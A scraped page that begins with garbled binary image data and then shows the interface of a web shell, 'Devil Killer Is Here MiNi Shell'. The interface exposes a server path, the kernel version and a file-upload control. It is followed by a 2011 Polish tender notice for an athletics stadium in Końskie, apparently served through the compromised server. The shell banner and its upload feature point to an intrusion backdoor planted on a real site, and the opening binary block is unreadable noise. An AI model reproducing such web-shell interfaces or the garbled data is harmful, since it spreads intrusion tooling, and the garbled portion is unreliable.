JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110215/53909-N-2011.html

<p class="kh_header"><b>Końskie: Budowa stadionu lekkoatletycznego w Gminie Końskie</b><br>
<b>Numer ogłoszenia: 53909 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskie , ul. Partyzantów 1/24, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3723249, 3723720, faks 041 3722955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umkonskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa stadionu lekkoatletycznego w Gminie Końskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pod nazwą: Budowa stadionu lekkoatletycznego w Gminie Końskie.

Zakres zadania obejmuje wykonanie następujących elementów zagospodarowania terenu :

-budynku zapleczowo-biurowego z niezależną konstrukcyjnie sceną do występów artystycznych i ławkami dla 400 widzów
-drogi dla pojazdów kołowych o szer. 5,3m pełniącej funkcję drogi pożarowej dla budynku zapleczowo-biurowego
-parkingu dla samochodów pracowników ośrodka sportowego na 20 miejsc postojowych (w tym jedno miejsce postojowe dla samochodu osoby niepełnosprawnej)
-placu postojowego dla bojowych pojazdów służb ratowniczych
-wejścia dla kibiców drużyny gospodarzy wraz z budynkiem kas i depozytu
-żelbetowej, ziemnej, zadaszonej trybuny dla kibiców gospodarzy na 1176 miejsc siedzących (z możliwością rozbudowy do 1538 miejsc siedzących)
-bieżni okrężnej do biegu 400m, bieżni prostej 100m z nabiegiem i wybiegiem -sztuczna nawierzchnia. Wewnątrz bieżni 400m znajduje się pełnowymiarowe boisko piłkarskie 105m x 68m z nawierzchnią z trawy naturalnej
-drogi dla autobusów kibiców gości
-placu manewrowego o wym. 20m x 20m dla bojowych pojazdów służb ratowniczych oraz dla autobusów kibiców gości
-trybuny dla widzów gości (140 miejsc siedzących) z placem parkingowym dla autobusów kibiców gości
-budynku z sanitariatami
-ścieżki rowerowej o szerokości 2,5 m zakończona na dwóch końcach rondami 
do nawracania
-zjazdu na działkę z ulicy Olimpijskiej

Ponadto na terenie objętym realizacją zadania znajdują się elementy przeznaczone 
do likwidacji wyszczególnione w dokumentacji projektowej.  
Wokół terenu objętego opracowaniem oraz na nim zaprojektowano ogrodzenie.

Szczegółowy opis przedmiotu zamówienia określa: dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, załączona do specyfikacji istotnych warunków zamówienia i stanowiąca jej integralną część,  wymagania odnoszące się do przebiegu procesu budowlanego, sposobu wykonania zamówienia i jego finansowego oraz formalno-prawnego rozliczenia zostały opisane również we wzorze umowy. 
Ponadto Zamawiający załącza do SIWZ przedmiary robót z poszczególnych branż stanowiące materiał pomocniczy.

Na podstawie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót,  Zamawiający formułuje następujące warunki techniczne, jakościowe i użytkowe dotyczące nawierzchni syntetycznej. 
Jako nawierzchnię sportową przyjmuje się prefabrykowaną wykładzinę kauczukową 
o następujących minimalnych parametrach techniczno - użytkowych:

Poz.	           Określenie parametru, jednostka			Wartość wymagania

1		Grubość całkowita - podstawowa (mm)			              13

2		Przepuszczalność dla wody					              Nie

3		Konstrukcja: prefabrykowana wykładzina kauczukowa,	                 -
nieprzepuszczalna dla wody, montowana przez klejenie
do podłoża na całej powierzchni za pomocą kleju
poliuretanowego.

4		Wytrzymałość na rozciąganie (Mpa)				                0,55

5		Odkształcenie pionowe (mm)				                2,2

6		Pochłanianie wstrząsów (%)					                40

7		Szerokość rolki (cm)						                122

8		Ciężar właściwy (kg/m2)					               11,5


Wymaganie dotyczące nawierzchni kauczukowej.
A. - Nawierzchnia kauczukowa powinna być przeznaczona do montażu na placu budowy. Nie dopuszcza się stosowania nawierzchni wykonywanych na placu budowy metodą In-situ 
(w całości ani częściowo).
B. - Nawierzchnia może być instalowana jedynie przez autoryzowanego wykonawcę 
o kwalifikacjach potwierdzonych stosownym dokumentem wystawionym przez producenta nawierzchni i dotyczącym powyższego zadania.
C. - Gwarancja na oferowaną nawierzchnię powinna zostać wystawiona przez producenta 
i dotyczyć przedmiotowego zadania 
D. - Spełnianie wszystkich wymaganych minimalnych parametrów nawierzchni określonych powyżej należy potwierdzić wiarygodnymi dokumentami, (np. Aprobata lub Rekomendacja Techniczna ITB, karta techniczna producenta, sprawozdanie Labosport) pozwalającymi na ich weryfikację.
E. - Nawierzchnia powinna posiadać aktualny Atest Higieniczny.
F. - Parametry techniczne i użytkowe nawierzchni muszą odpowiadać standardom IAAF 
do poziomu Class 1, co powinno zostać potwierdzone stosownym dokumentem (nawierzchnia powinna być wykonana na co najmniej jednym obiekcie, który uzyskał certyfikat IAAF Class 1 - potwierdzić stosownym dokumentem).
G. - Do oferty należy dołączyć próbkę oferowanej nawierzchni kauczukowej spełniającej wymagane min. parametry o wymiarach min. 15x10cm z metryką producenta określającą nazwę 
i typ nawierzchni.
H. Nawierzchnia winna być produkowana zgodnie z Europejską Normą 14877.


Na podstawie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót.
Zamawiający formułuje następujące warunki techniczne, jakościowe i użytkowe dotyczące murawy naturalnej przeznaczonej na boisko do piłki nożnej:

PRODUKCJA TRAWY
Obsiewana i przemysłowo pielęgnowana darń murawy naturalnej powinna być przygotowana przez firmę specjalistyczną. W chwili przedstawienia oferty, Wykonawca musi posiadać rezerwację murawy, która została wybrana do wbudowania na płycie boiska i otrzymała dokument, roboczo zwany paszportem, który należy załączy do oferty.
Paszport darni powinien określać:
- wiek darni (datę wysiewu),
- lokalizację,
- mieszankę nasion.
Minimalne parametry dotyczące darni naturalnej:
- szeroko rolki: 200 cm, układana maszynowo za pomocą specjalistycznego sprzętu.
- wiek murawy: nie mniejszy ni 1,5 roku, nie większy ni 2,5 roku. Wiek murawy należy potwierdzić odpowiednim dokumentem (paszportem).

Wykonawca zobowiązany jest załączyć do oferty:
1. Autoryzację Producenta murawy na dostaw oferowanej w paszporcie darni wraz z określeniem przeznaczenia (nazwa inwestycji)
2. Paszport określony powyżej.

Trawa naturalna - właściwości :
Trawa z rolki hodowana w okresie 12-24 miesiące

Parametry trawy:
Grubość 1,5cm -2,0 cm,
Wymiary 40x200 cm,
Ciężar 1 m2 ok.23 kg,

Do transportu - materiał waletowany po 50 m2

Skład gatunkowo-odmianowy mieszanki:
Gatunek Odmiana Udział w mieszance:
-życica trwała Taya, Stadion 50%
-wiechlina łąkowa Conni, Mirakle 40%
-kostrzewa czerwona Oliwia, Mirena 10%

Skład winien spełnia wymagania darni przygotowywanych na boiska sportowe dla piłki nożnej 
i być zgodny z norm opracowaną przez Polską Izbę Nasienną 2004 r. Wydanie IHAR. Darń niezależnie od składu początkowego może ulegać zmianom w zależności od użytkowania trawnika, pielęgnacji, warunków glebowych i pory roku.
Życica trwała zapewnia na boisku szybką regenerację po zniszczeniach związanych z grą, Wiechlina łąkowa - trwałość darni przez wiele lat, a kostrzewa czerwona jako klapa bezpieczeństwa utrzymuje zieleń na ubogich i niedostatecznie nawodnionych powierzchniach.

Wzmocnienie murawy naturalnej
W obrębie obu pól bramkowych (2x18,32x5,50m) boiska z murawą naturalną, ułożyć darń z rolki o grubości min.5cm, ze wzmocnieniem w postaci maty (wykładziny tkanej typu trawa syntetyczna) przygotowanej i przeznaczonej jako wzmocnienie trawy naturalnej.
Powierzchnia całkowita ze wzmocnieniem: 201,52m2.

Wymagania minimalne dla części wzmocnionej:
- wysokość całkowita : 72 mm
- rodzaj włókna: 100% polietylen, monofil, grubo minimalna:150mikronów,
- kolor włókien: : zielony w dwóch odcieniach
- nasycenie włókna (dtex) : 30.000
- gęstość splotów : 1.600/m2 ,
- osnowa : dwa rodzaje włókna - tkanina z polipropylenu, przepleciona przez bazową tkaninę, podlegającą biodegradacji,
- technologia produkcji: tkanie
- wypełnienie : ziemia żyzna, przeznaczona do zasiewu trawy naturalnej - 5cm
Przepuszczalność dla wody (bez wypełnienia): 200l/m2/min.

Mieszanka, użyta do zasiewu wzmocnienia syntetycznego, powinna posiadać odmiany traw identyczne i w identycznych proporcjach jak darń układana z rolki.

Wykaz załączników do oferty w opisanym zakresie:
- Autoryzacja dla Wykonawcy wystawiona i podpisana przez Producenta, z określeniem przeznaczenia (nazwa inwestycji).
- Próbka oferowanego produktu o wymiarach min. 20x15cm.
- Karta techniczna podpisana przez producenta z określeniem przeznaczenia (nazwa inwestycji).
- Atest higieniczny na oferowany produkt części wzmocnionej

.
Uwaga jeżeli w SIWZ lub załącznikach w opisie przedmiotu zamówienia została wskazana nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach nie gorszych niż wskazane.( Fakt ten należy wskazać w ofercie).

Zamawiający wymaga, aby:
1) wykonane roboty budowlane zostały objęte 3-letnią rękojmią i 3-letnią gwarancją;
2) wykonane naturalne nawierzchnie sportowe zostały objęte 3-letnią rękojmią i 3-letnią gwarancją;
3) wykonane syntetyczne nawierzchnie sportowe zostały objęte 5-letnią rękojmią i 5-letnią gwarancją.

OBOWIĄZKIEM WYKONAWCY jest: badanie stadionu: 
- uzyskanie Świadectwa PZLA pozwalającego na przeprowadzenie na stadionie oficjalnych zawodów lekkoatletycznych po zakończeniu budowy
- uzyskanie Certyfikatu IAAF CLASS 2 nawierzchni sztucznej ułożonej na stadionie. 

Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej budowy celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem przetargu 
oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium najpóźniej do dnia    03.03.2011 do godziny 09:00 (czasu lokalnego) w wysokości:
402 546,00 zł ( słownie: czterysta dwa tysiące pięćset czterdzieści sześć złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia 
 Wykonawca winien wskazać że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej dwie roboty budowlane, polegające na budowie co najmniej 2 stadionów lekkoatletycznych 
z pełnowymiarową kauczukową bieżnią okrężną i boiskiem naturalnym, 
o wartości nie mniejszej niż 10 000 000 złotych (każda robota) w tym jeden który uzyskał Certyfikat IAAF CLASS. Zakres wykazanej roboty budowlanej winien obejmować wykonanie: 
1) 400-metrowej bieżni okrężnej o nawierzchni kauczukowej, o co najmniej o 6 torach,
2) pełnowymiarowego boiska piłkarskiego o nawierzchni z trawy naturalnej,
3) trybuny zadaszonej 
4) obiektów kubaturowych
5) robót w zakresie zagospodarowania terenu,
6) robót w zakresie instalacji wod.-kan. zewnętrznych,
7) robót w zakresie instalacji elektroenergetycznych z oświetleniem
Podstawą oceny spełnienia warunku, o którym mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełniania warunku dysponowania potencjałem technicznym Wykonawca winien wykazać że dysponuje narzędziami /urządzeniami technicznymi niezbędnymi do realizacji zamówienia a w szczególności:

        -   Ciągnik kołowy 75-85 KM  ( co najmniej 1 szt)
-Samochód samowyładowczy 10-15 t ( co najmniej 1 szt)
-Samochód samowyładowczy 5-10 t  ( co najmniej 1 szt.)
-Spycharka gąsienicowa 55 kW (75 KM)  ( co najmniej 1 szt.)
-Spycharka gąsienicowa 74 kW (100 KM) ( co najmniej 1 szt.) 
-Walec statycz.samoj.10t ( co najmniej 1 szt)
-Walec wibrac.samojezd.7,5t ( co najmniej 1 szt)
-Żuraw samochodowy ( co najmniej 1 szt.)
-Koparka gąsienicowa 0.60 m3 ( co najmniej 1 szt.)
-Koparka 0.25 m3 ( co najmniej 1 szt)
-Samochód dostawczy 0.9 t ( co najmniej 1 szt.)
-Samochód skrzyniowy ( co najmniej 1 szt) 
Podstawą oceny spełnienia warunku, o którym mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi 
do wykonania zamówienia
- Wykonawca winien wykazać,  osoby które będą uczestniczyć w realizacji zamówienia:
posiadające wymagane uprawnienia do pełnienia samodzielnych funkcji technicznych 
w budownictwie, w szczególności uprawnionymi do pełnienia funkcji kierownika budowy 
i kierowników robót w zakresie niezbędnym do realizacji zamówienia.

Za spełnienie tego warunku Zamawiający uzna wykazanie dysponowania osobami uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie
w specjalnościach:

Kierownik budowy winien posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, a kierownicy robót w specjalnościach: drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń
Należy złożyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (określone w warunku powyżej)
Podstawą oceny spełnienia warunku, o którym mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej 
i finansowej Wykonawca winien przedstawić: informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert , przy czym wysokość posiadanych środków finansowych lub zdolność kredytowa nie może być niższa niż 2000 000 zł 
Podstawą oceny spełnienia warunku, o którym mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
